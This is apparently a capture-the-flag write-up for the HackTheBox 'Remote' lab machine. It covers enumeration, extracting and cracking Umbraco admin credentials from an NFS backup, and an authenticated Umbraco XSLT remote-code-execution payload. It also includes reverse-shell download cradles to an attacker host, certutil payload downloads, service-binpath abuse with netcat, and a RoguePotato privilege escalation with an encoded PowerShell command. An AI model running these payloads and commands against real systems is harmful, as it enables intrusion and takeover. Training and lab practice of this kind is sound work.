> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-remote.md).

# HackTheBox - Remote

![](/files/-MZhTKIsXlpEa_vCZzkK)

### Nmap scan results

```csharp
nmap -p- -A -T4 -oA nmap-remote 10.10.10.180
```

![](/files/-MZh0N2uUcF_eBekWovC)

Let's enumerate the FTP Server and see if we can get any **`sensitive/conf`** files.

![Epic Fail](/files/-MZh1JmGexTt69t7Vw_Q)

### Enumerating webserver (Microsoft HTTPAPI)

![](/files/-MZh1ysxI0ecwJX-onBL)

There's a [Umbraco ](https://umbraco.com/)CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.

> Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

```csharp
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50
```

![](/files/-MZh2W5lioJwhkUVgSON)

**There are certain exploits available for this CMS but we need to enumerate the version used.**&#x20;

![](/files/-MZh2k_dXsvnzir8SB0L)

### Mounting the [NFS ](https://www.datto.com/blog/what-is-nfs-file-share)Share

{% hint style="info" %}
&#x20;**NFS**, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or **share** files on a remote computer as though it was a local computer.
{% endhint %}

```csharp
mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock
```

![](/files/-MZh3Q2_gEbUW27tOXdW)

![](/files/-MZh3apHzxec_nQUnaNw)

So the configuration file for Umbraco CMS is stored in **`Umbraco.sdf`** file which contains the usernames and passwords. The file is located at **`App_data/Umbraco.sdf`**

I actually ran **strings** on Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used. Check **`Web.config`** file

![](/files/-MZh99f8lwPG6UbrRFct)

![](/files/-MZh4l_1WKnAEyjbDUUE)

Get the SHA-1 hash for admin and crack it using **John** or **hashcat**.

![](/files/-MZh59pKLRxa9i0Hc9g9)

Now that we have credentials, we can try to exploit that **`(Authenticated) Remote Code Execution`**

### Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at **`http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx`**

```markup
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml() 
    { 
        string cmd = "<cmd-arguments>"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "<cmd>"; 
        proc.StartInfo.Arguments = cmd; 
        proc.StartInfo.UseShellExecute = false; 
        proc.StartInfo.RedirectStandardOutput = true;  
        proc.Start(); string output = proc.StandardOutput.ReadToEnd(); 
        return output;
     }  
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> 
 </xsl:template> </xsl:stylesheet>
```

![](/files/-MZh7TBq6JuDp_ax8BYO)

![](/files/-MZh7VJlvwtGw_YUNL6K)

### Using [nishang's](https://github.com/samratashok/nishang/tree/master/Shells) powershell script to get a reverse shell

```c
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"
```

![](/files/-MZhAN6VV4eJZYDPxujw)

### Running winpeas.exe (Privilege Escalation)

```c
certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe
```

![](/files/-MZhEYeMI6ZBNn6CFhea)

![](/files/-MZhEQBriAn-Tg7uHZfp)

> If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:

{% embed url="<https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>" %}

```bash
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
```

```bash
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
```

```bash
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AY
QBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
```

![](/files/-MZhL_I1aeUprmmv9hnl)

### Trying Rogue Potato Attack&#x20;

{% embed url="<https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html>" %}

Download the exploit from [here ](https://github.com/antonioCoco/RoguePotato/releases/tag/1.0)and transfer it to the target machine using **`certutil.exe`**

```cpp
certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe
```

The exploit doesn't work without providing **CLSID**, we can get **CLSID** for UsoSvc service from [here](http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/).

> A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

```cpp
.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
```

![](/files/-MZhT2oSMcKgAz980cza)
